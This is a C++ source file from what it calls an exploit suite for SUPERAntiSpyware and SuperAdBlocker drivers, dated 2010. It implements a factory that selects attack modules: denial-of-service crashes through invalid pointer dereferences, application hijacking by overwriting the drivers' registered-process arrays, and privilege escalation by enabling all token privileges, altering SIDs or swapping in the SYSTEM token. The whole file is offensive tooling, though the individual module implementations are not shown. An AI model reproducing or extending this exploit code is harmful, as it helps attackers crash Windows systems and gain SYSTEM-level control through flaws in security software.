/*
* Copyright (c) 2010 by <milkovic.luka@gmail.com>
*
* SuperAdBlocker <= v4.6.1000 and SUPERAntiSpyware <= 4.34.1000 exploit suite
* --- by AelTHeGriN <aelthegrin@gmail.com> --- (Mar 2010)
*
*/

#include "StdAfx.h"
#include "AttackModuleFactory.h"
#include "SABKUTILConnector.h"
#include "SASKUTILConnector.h"
#include "DoSRegisteredProcesses.h"
#include "OpenProcessDoS.h"
#include "RegistryHack.h"
#include "PrivilegesEscalation.h"

AttackModuleFactory::AttackModuleFactory(DRIVER driverID, ATTACK_ID attackID)
					: m_driverID(driverID), m_attackID(attackID)
{
	// intentionally left empty
}

AttackModuleFactory::~AttackModuleFactory(void)
{
	// intentionally left empty
}

boost::shared_ptr<IAttackModule> AttackModuleFactory::GetAttackModule(void)
{
	boost::shared_ptr<IAttackModule> pAttackModule;

	if(m_driverID == SABKUTIL)
	{
		m_driverConnector.reset(new SABKUTILConnector());
	}
	else if(m_driverID == SASKUTIL)
	{
		m_driverConnector.reset(new SASKUTILConnector());
	}
	else
	{
		tcout << "[-] No driver with such ID!" << std::endl << std::endl;
		return pAttackModule;
	}

	switch(m_attackID)
	{
		case DOS_REG_PROCESSES:
		{

			DoSRegisteredProcesses *regProcesses = new DoSRegisteredProcesses(m_driverConnector);
			if(m_driverID == SABKUTIL)
			{
				tcout << "Starting DoS by overwriting array of registered processes..." << std::endl << std::endl;
			}
			// if SASKUTIL
			else 
			{
				tcout << "Starting application hijack by overwriting array of registered processes..." << std::endl << std::endl;
				regProcesses->SendPacketsForever(false);
			}

			pAttackModule.reset(regProcesses);
			break;
		}
		case DOS_OPEN_PROCESS:
		{
			tcout << "Starting DoS by invalid pointer dereference in ZwOpenProcess() wrapper..." << std::endl << std::endl;
			pAttackModule.reset(new OpenProcessDoS(m_driverConnector));
			break;
		}
		case DOS_QUERY_VALUE_KEY:
		{
			tcout << "Starting DoS by invalid pointer dereference in ZwQueryValueKey() wrapper..." << std::endl << std::endl;
			pAttackModule.reset(new RegistryHack(m_driverConnector, RegistryHack::DOS));
			break;
		}
		case DOS_SET_VISTA_TOKEN:
		{
			tcout << "Starting DoS by NULL pointer dereference while setting token information..." << std::endl << std::endl;
			pAttackModule.reset(new PrivilegesEscalation(m_driverConnector));
			break;
		}
		case ESCALATION_TOKEN:
		{
			tcout << "Starting privilege escalation by enabling all privileges in chosen process (ONLY FOR CURRENT PROCESS IN VISTA AND 7)..." << std::endl << std::endl;
			DWORD dwPID = 0;
			tcout << std::endl << "Enter PID of the process whose token privileges will be modified (-1 for current process): ";
			std::cin >> dwPID;
			tcout << std::endl;
			pAttackModule.reset(new PrivilegesEscalation(m_driverConnector, PrivilegesEscalation::ALL_PRIVILEGES, dwPID));
			break;
		}
		case ESCALATION_SIDS:
		{
			tcout << "Starting privilege escalation by adjusting token SIDs in chosen process (ONLY FOR CURRENT PROCESS IN VISTA AND 7)..." << std::endl << std::endl;
			DWORD dwPID = 0;
			tcout << std::endl << "Enter PID of the process whose token privileges will be modified (-1 for current process): ";
			std::cin >> dwPID;
			tcout << std::endl;
			pAttackModule.reset(new PrivilegesEscalation(m_driverConnector, PrivilegesEscalation::ALL_SIDS, dwPID));
			break;
		}
		case ESCALATION_TOKEN_SWITCH:
		{
			tcout << "Starting privilege escalation by switching current process token with SYSTEM process token..." << std::endl << std::endl;
			pAttackModule.reset(new PrivilegesEscalation(m_driverConnector, PrivilegesEscalation::TOKEN_SWITCH));
			break;
		}
		default:
			tcout << "Invalid attack ID!" << std::endl << std::endl;
	}

	return pAttackModule;
}